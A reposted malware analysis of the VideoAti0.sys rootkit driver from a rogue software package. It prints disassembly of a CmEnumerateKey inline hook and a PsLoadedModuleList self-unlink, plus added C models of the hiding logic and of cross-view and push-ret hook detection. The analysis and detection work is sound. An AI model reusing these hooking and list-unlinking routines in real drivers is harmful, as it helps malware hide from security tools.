Analysis of the RK (rootkit) driver in the u88财富快车 rogue software
Source: Internet. Editor: 程序博客网. Date: 2024/04/30 00:20
BY mj0011
The RK part consists of three files:
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
The driver is a boot-start driver (start type 0). It mainly does the following:
1. Registers a CreateProcessNotifyRoutine. Once it sees userinit.exe being loaded, it modifies the registry Run entry so that VideoAti0.exe gets started. After VideoAti0.exe starts, it deletes its own Run entry and injects VideoAti0.dll, so no startup entry can be found once the system is up.
2. Hooks CmEnumerateKey to hide the service entry of VideoAti0.sys, so IceSword, gmer, RKU and similar tools cannot detect it.
When the CreateProcessNotifyRoutine has identified the caller of CmEnumerateKey as one of the following processes, it lifts its own hook for that call, in an attempt to slip by :D
fhs.exe, knlsc13.exe
3. Hooks the FSD dispatch routines: the IRP_MJ_CREATE and IRP_MJ_DIRECTORY_CONTROL handlers of /FileSystem/Ntfs and /FileSystem/FastFat. With the default rule set it first filters out
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
so that they cannot be listed.
Rules can also be added from R3 to R0.
4. Removes itself from PsLoadedModuleList, so IceSword, gmer and similar tools cannot detect it; gmer can see the FSD hook, but cannot tell which module installed it.
The R3 rules later turned out to be quite extreme: after the system logs on, loading a driver from any location fails :D
The IDB file from the analysis is in the archive; reading it is not much different from reading source code.
A few code excerpts:
.text:000112D4 NewCMEnumerateKey proc near ; DATA XREF: ReadyHardCodeAndHook+1DBo
.text:000112D4 ; NewCMEnumerateKey+14Co
.text:000112D4
.text:000112D4 var_24 = byte ptr -24h
.text:000112D4 NewIrql = byte ptr -1
.text:000112D4 arg_0 = dword ptr 8
.text:000112D4 arg_4 = dword ptr 0Ch
.text:000112D4 arg_8 = dword ptr 10h
.text:000112D4 arg_C = dword ptr 14h
.text:000112D4 arg_10 = dword ptr 18h
.text:000112D4 arg_14 = dword ptr 1Ch
.text:000112D4
.text:000112D4 push ebp
.text:000112D5 mov ebp, esp
.text:000112D7 sub esp, 24h
.text:000112DA push ebx
.text:000112DB push esi
.text:000112DC push edi
.text:000112DD call ds:KeRaiseIrqlToDpcLevel
.text:000112E3 mov [ebp+NewIrql], al
.text:000112E6 call WP_OFF
.text:000112E6
.text:000112EB pushf
.text:000112EC pusha
.text:000112ED lea esi, unk_14390
.text:000112F3 mov edi, CmEnumerateKeyAddress
.text:000112F9 mov ecx, 6
.text:000112FE cld
.text:000112FF rep movsb
.text:00011301 popa
.text:00011302 popf
.text:00011303 call WP_ON
.text:00011303
.text:00011308 mov cl, [ebp+NewIrql] ; NewIrql
.text:0001130B call ds:KfLowerIrql
.text:00011311 push [ebp+arg_14]
.text:00011314 mov ebx, [ebp+arg_C]
.text:00011317 mov esi, [ebp+arg_4]
.text:0001131A push [ebp+arg_10]
.text:0001131D add esi, dword_14374
.text:00011323 push ebx
.text:00011324 push [ebp+arg_8]
.text:00011327 push esi
.text:00011328 push [ebp+arg_0]
.text:0001132B call OldcmEnumerateKey
.text:00011331 test eax, eax
.text:00011333 mov [ebp+arg_4], eax
.text:00011336 jge short loc_11342
.text:00011336
.text:00011338 cmp eax, 8000001Ah
.text:0001133D jmp loc_113FF
.text:0001133D
.text:00011342 ; ---------------------------------------------------------------------------
.text:00011342
.text:00011342 loc_11342: ; CODE XREF: NewCMEnumerateKey+62j
.text:00011342 lea eax, [ebp+var_24]
.text:00011345 push eax ; char *
.text:00011346 call GetCurrentCallProcess
.text:00011346
.text:0001134B mov edi, ds:_stricmp
.text:00011351 lea eax, [ebp+var_24]
.text:00011354 push offset s_Fhs_exe ; "fhs.exe"
.text:00011359 push eax ; char *
.text:0001135A call edi ; _stricmp
.text:0001135C pop ecx
.text:0001135D test eax, eax
.text:0001135F pop ecx
.text:00011360 jnz short loc_1136D
.text:00011360
.text:00011362 lea eax, [ebp+var_24]
.text:00011365 push eax
.text:00011366 push offset s_ProcessnameS ; "ProcessName:%S\n"
.text:0001136B jmp short loc_11387
.text:0001136B
.text:0001136D ; ---------------------------------------------------------------------------
.text:0001136D
.text:0001136D loc_1136D: ; CODE XREF: NewCMEnumerateKey+8Cj
.text:0001136D lea eax, [ebp+var_24]
.text:00011370 push offset s_Knlsc13_exe ; "knlsc13.exe"
.text:00011375 push eax ; char *
.text:00011376 call edi ; _stricmp
.text:00011378 pop ecx
.text:00011379 test eax, eax
.text:0001137B pop ecx
.text:0001137C jnz short loc_11390
.text:0001137C
.text:0001137E lea eax, [ebp+var_24]
.text:00011381 push eax
.text:00011382 push offset s_Processname_0 ; "ProcessName:%S\n"
.text:00011382
.text:00011387
.text:00011387 loc_11387: ; CODE XREF: NewCMEnumerateKey+97j
.text:00011387 call DbgPrint
.text:00011387
.text:0001138C pop ecx
.text:0001138D pop ecx
.text:0001138E jmp short StopHook
.text:0001138E
.text:00011390 ; ---------------------------------------------------------------------------
.text:00011390
.text:00011390 loc_11390: ; CODE XREF: NewCMEnumerateKey+A8j
.text:00011390 mov edi, dword_1439C
.text:00011390
.text:00011396
.text:00011396 loc_11396: ; CODE XREF: NewCMEnumerateKey+EFj
.text:00011396 cmp edi, offset HideReg
.text:0001139C jz short StopHook
.text:0001139C
.text:0001139E test edi, edi
.text:000113A0 jz short StopHook
.text:000113A0
.text:000113A2 push dword ptr [edi-8] ; wchar_t *
.text:000113A5 call ds:wcslen
.text:000113AB push eax ; size_t
.text:000113AC lea eax, [ebx+10h]
.text:000113AF push eax ; wchar_t *
.text:000113B0 push dword ptr [edi-8] ; wchar_t *
.text:000113B3 call ds:_wcsnicmp
.text:000113B9 add esp, 10h
.text:000113BC test eax, eax
.text:000113BE jz short loc_113C5
.text:000113BE
.text:000113C0 mov edi, [edi+4]
.text:000113C3 jmp short loc_11396
.text:000113C3
.text:000113C5 ; ---------------------------------------------------------------------------
.text:000113C5
.text:000113C5 loc_113C5: ; CODE XREF: NewCMEnumerateKey+EAj
.text:000113C5 push dword ptr [edi-8]
.text:000113C8 push offset s_FoundHideregS ; "Found HideReg:%S\n"
.text:000113CD call DbgPrint
.text:000113CD
.text:000113D2 pop ecx
.text:000113D3 inc esi
.text:000113D4 pop ecx
.text:000113D5 mov dword_14374, 1
.text:000113DF push [ebp+arg_14]
.text:000113E2 push [ebp+arg_10]
.text:000113E5 push ebx
.text:000113E6 push [ebp+arg_8]
.text:000113E9 push esi
.text:000113EA push [ebp+arg_0]
.text:000113ED call OldcmEnumerateKey
.text:000113F3 test eax, eax
.text:000113F5 mov [ebp+arg_4], eax
.text:000113F8 jge short StopHook
.text:000113F8
.text:000113FA cmp eax, 8000001Ah
.text:000113FA
.text:000113FF
.text:000113FF loc_113FF: ; CODE XREF: NewCMEnumerateKey+69j
.text:000113FF jnz short StopHook
.text:000113FF
.text:00011401 and dword_14374, 0
.text:00011401
.text:00011408
.text:00011408 StopHook: ; CODE XREF: NewCMEnumerateKey+BAj
.text:00011408 ; NewCMEnumerateKey+C8j
.text:00011408 ; NewCMEnumerateKey+CCj
.text:00011408 ; NewCMEnumerateKey+124j
.text:00011408 ; NewCMEnumerateKey:loc_113FFj
.text:00011408 call ds:KeRaiseIrqlToDpcLevel
.text:0001140E mov [ebp+NewIrql], al
.text:00011411 call WP_OFF
.text:00011411
.text:00011416 pusha
.text:00011417 mov edi, CmEnumerateKeyAddress
.text:0001141D mov al, 68h
.text:0001141F stosb
.text:00011420 lea eax, NewCMEnumerateKey
.text:00011426 stosd
.text:00011427 mov al, 0C3h
.text:00011429 stosb
.text:0001142A popa
.text:0001142B call WP_ON
.text:0001142B
.text:00011430 mov cl, [ebp+NewIrql] ; NewIrql
.text:00011433 call ds:KfLowerIrql
.text:00011439 mov eax, [ebp+arg_4]
.text:0001143C pop edi
.text:0001143D pop esi
.text:0001143E pop ebx
.text:0001143F leave
.text:00011440 retn 18h
.text:00011440
.text:00011440 NewCMEnumerateKey endp
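A C model of the index-shifting logic in NewCMEnumerateKey above, written for this note rather than taken from the driver, together with the cross-view check a tool comparing hooked and raw enumeration would run. It assumes a flat array of subkey names in place of the registry, `raw_enumerate` as a stand-in for OldcmEnumerateKey, a `caller` string in place of GetCurrentCallProcess, and the status value 0x8000001A (STATUS_NO_MORE_ENTRIES) that the listing compares against.

```c
#include <string.h>
#include <strings.h>

#define STATUS_SUCCESS         0x00000000u
#define STATUS_NO_MORE_ENTRIES 0x8000001Au  /* the constant compared in the listing */

typedef struct { const char **names; int count; } KeyList;  /* constructed stand-in for subkeys / HideReg */
static int g_shift = 0;  /* dword_14374 in the listing: one global index shift shared by every caller */

/* Stand-in for OldcmEnumerateKey, the unhooked enumeration. */
unsigned raw_enumerate(const KeyList *k, int index, const char **name) {
    if (index < 0 || index >= k->count) return STATUS_NO_MORE_ENTRIES;
    *name = k->names[index]; return STATUS_SUCCESS;
}

/* HideReg match as in the listing: _wcsnicmp over the hide entry's length, i.e. a prefix test. */
static int is_hidden(const KeyList *hide, const char *name) {
    for (int i = 0; i < hide->count; i++)
        if (strncasecmp(hide->names[i], name, strlen(hide->names[i])) == 0) return 1;
    return 0;
}

/* Model of NewCMEnumerateKey; fhs.exe and knlsc13.exe get the unfiltered result. */
unsigned hooked_enumerate(const KeyList *k, const KeyList *hide, const char *caller,
                          int index, const char **name) {
    int real = index + g_shift;                                   /* add esi, dword_14374 */
    unsigned st = raw_enumerate(k, real, name);
    if (st == STATUS_NO_MORE_ENTRIES) { g_shift = 0; return st; } /* and dword_14374, 0 */
    if (st != STATUS_SUCCESS) return st;
    if (!strcasecmp(caller, "fhs.exe") || !strcasecmp(caller, "knlsc13.exe")) return st;
    if (!is_hidden(hide, *name)) return st;
    g_shift = 1;                                                  /* mov dword_14374, 1 */
    st = raw_enumerate(k, real + 1, name);                        /* inc esi; call OldcmEnumerateKey again */
    if (st == STATUS_NO_MORE_ENTRIES) g_shift = 0;
    return st;
}

/* Cross-view check: names the raw path returns that the hooked path never shows `caller`.
   Stores them in out[] and returns the count (k->count <= 64 assumed). */
int cross_view_hidden(const KeyList *k, const KeyList *hide, const char *caller,
                      const char **out, int max) {
    int seen[64] = {0}, n = 0; const char *nm;
    g_shift = 0;
    for (int i = 0; hooked_enumerate(k, hide, caller, i, &nm) == STATUS_SUCCESS; i++)
        for (int j = 0; j < k->count; j++) if (nm == k->names[j]) seen[j] = 1;
    for (int j = 0; j < k->count && n < max; j++) if (!seen[j]) out[n++] = k->names[j];
    return n;
}
```

With a constructed subkey list {Alerter, VideoAti0, Beep, Browser} and HideReg {VideoAti0}, `cross_view_hidden` returns 1 (VideoAti0) for caller regedit.exe and 0 for caller fhs.exe. Because only one re-call is made, two adjacent hidden names let the second one through, which the same check exposes.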
.text:00011794 RemoveMyselfFormPsLoadModuleLIst proc near ; CODE XREF: start:loc_1049Fp
.text:00011794
.text:00011794 var_208 = word ptr -208h
.text:00011794
.text:00011794 push ebp
.text:00011795 mov ebp, esp
.text:00011797 sub esp, 208h
.text:0001179D and [ebp+var_208], 0
.text:000117A5 push esi
.text:000117A6 push edi
.text:000117A7 mov ecx, 81h
.text:000117AC xor eax, eax
.text:000117AE lea edi, [ebp-206h]
.text:000117B4 rep stosd
.text:000117B6 stosw
.text:000117B8 mov eax, PsLoadedModuleList
.text:000117BD mov edi, [eax]
.text:000117BF mov esi, edi
.text:000117BF
.text:000117C1
.text:000117C1 loc_117C1: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+88j
.text:000117C1 cmp dword ptr [esi+20h], 0
.text:000117C5 jz short loc_11816
.text:000117C5
.text:000117C7 push dword ptr [esi+28h] ; VirtualAddress
.text:000117CA call ds:MmIsAddressValid
.text:000117D0 test al, al
.text:000117D2 jz short loc_11816
.text:000117D2
.text:000117D4 mov eax, [esi+28h]
.text:000117D7 test eax, eax
.text:000117D9 jz short loc_11816
.text:000117D9
.text:000117DB movzx ecx, word ptr [esi+24h]
.text:000117DF shr ecx, 1
.text:000117E1 push ecx ; size_t
.text:000117E2 push eax ; wchar_t *
.text:000117E3 lea eax, [ebp+var_208]
.text:000117E9 push eax ; wchar_t *
.text:000117EA call ds:wcsncpy
.text:000117F0 lea eax, [ebp+var_208]
.text:000117F6 push eax ; wchar_t *
.text:000117F7 call ds:_wcslwr
.text:000117FD lea eax, [ebp+var_208]
.text:00011803 push offset s_Videoati0 ; "videoati0"
.text:00011808 push eax ; wchar_t *
.text:00011809 call ds:wcsstr
.text:0001180F add esp, 18h
.text:00011812 test eax, eax
.text:00011814 jnz short loc_1181E
.text:00011814
.text:00011816
.text:00011816 loc_11816: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+31j
.text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+3Ej
.text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+45j
.text:00011816 mov esi, [esi]
.text:00011818 cmp esi, edi
.text:0001181A jz short loc_11828
.text:0001181A
.text:0001181C jmp short loc_117C1
.text:0001181C
.text:0001181E ; ---------------------------------------------------------------------------
.text:0001181E
.text:0001181E loc_1181E: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+80j
.text:0001181E mov eax, [esi]
.text:00011820 mov esi, [esi+4]
.text:00011823 mov [eax+4], esi
.text:00011826 mov [esi], eax
.text:00011826
.text:00011828
.text:00011828 loc_11828: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+86j
.text:00011828 pop edi
.text:00011829 pop esi
.text:0001182A leave
.text:0001182B retn
.text:0001182B
.text:0001182B RemoveMyselfFormPsLoadModuleLIst endp
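An added C model, not from the page or the driver, of the two symptoms described in points 2 and 4: the 6-byte `push imm32; ret` patch that StopHook writes at the start of CmEnumerateKey, and the PsLoadedModuleList unlink at loc_1181E that leaves such a hook detectable but unattributable. The module names, base addresses and the target 0xF8A112D4 are constructed; the list entry keeps only Flink, Blink, name and image range.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed, minimal stand-in for a loaded-module list entry: links, name, image range. */
typedef struct Mod { struct Mod *Flink, *Blink; const char *name; uint32_t base, size; } Mod;

/* Circular list with a sentinel head, as PsLoadedModuleList is. */
void list_init(Mod *head) { head->Flink = head->Blink = head; head->name = NULL; head->size = 0; }
void list_append(Mod *head, Mod *m) {
    m->Flink = head; m->Blink = head->Blink; head->Blink->Flink = m; head->Blink = m;
}

/* The unlink at loc_1181E: both neighbours are re-pointed, the entry's own links are left as is. */
void unlink_entry(Mod *m) { m->Flink->Blink = m->Blink; m->Blink->Flink = m->Flink; }

/* Inline-hook check: does the routine begin with "push imm32; ret" (68 xx xx xx xx C3),
   the bytes StopHook writes? Returns 1 and the little-endian target if so. */
int detect_push_ret(const uint8_t *code, size_t len, uint32_t *target) {
    if (len < 6 || code[0] != 0x68 || code[5] != 0xC3) return 0;
    *target = (uint32_t)code[1] | (uint32_t)code[2] << 8 | (uint32_t)code[3] << 16 | (uint32_t)code[4] << 24;
    return 1;
}

/* Attribute an address by walking the list, as a scanner would. NULL means no listed owner. */
const char *owner_of(const Mod *head, uint32_t addr) {
    for (const Mod *m = head->Flink; m != head; m = m->Flink)
        if (addr >= m->base && addr < m->base + m->size) return m->name;
    return NULL;
}

/* Residue of the unlink: the detached entry still points into the list, but neither
   neighbour points back at it. Returns 1 for an unlinked entry, 0 for a listed one. */
int is_orphaned(const Mod *m) { return m->Flink->Blink != m || m->Blink->Flink != m; }

int main(void) {  /* constructed modules, a patched prologue, then the unlink */
    Mod head, nt = {0}, vid = {0};
    nt.name = "ntoskrnl.exe";  nt.base = 0x80400000u; nt.size = 0x200000u;
    vid.name = "VideoAti0.sys"; vid.base = 0xF8A10000u; vid.size = 0x6000u;
    list_init(&head); list_append(&head, &nt); list_append(&head, &vid);
    const uint8_t patched[6] = {0x68, 0xD4, 0x12, 0xA1, 0xF8, 0xC3};  /* push 0xF8A112D4 ; ret */
    uint32_t target; const char *who;
    if (!detect_push_ret(patched, sizeof patched, &target)) return 1;
    who = owner_of(&head, target);
    printf("hook -> %08X owned by %s\n", (unsigned)target, who ? who : "<no listed module>");
    unlink_entry(&vid);  /* what RemoveMyselfFormPsLoadModuleLIst does */
    who = owner_of(&head, target);
    printf("after unlink: %s, orphaned: %d\n", who ? who : "<no listed module>", is_orphaned(&vid));
    return 0;
}
```

Before the unlink the hook target resolves to VideoAti0.sys; afterwards the same list walk finds no owner, which is the "hook seen, module unknown" result described for gmer, while the detached entry's own dangling links remain a scannable trace in memory.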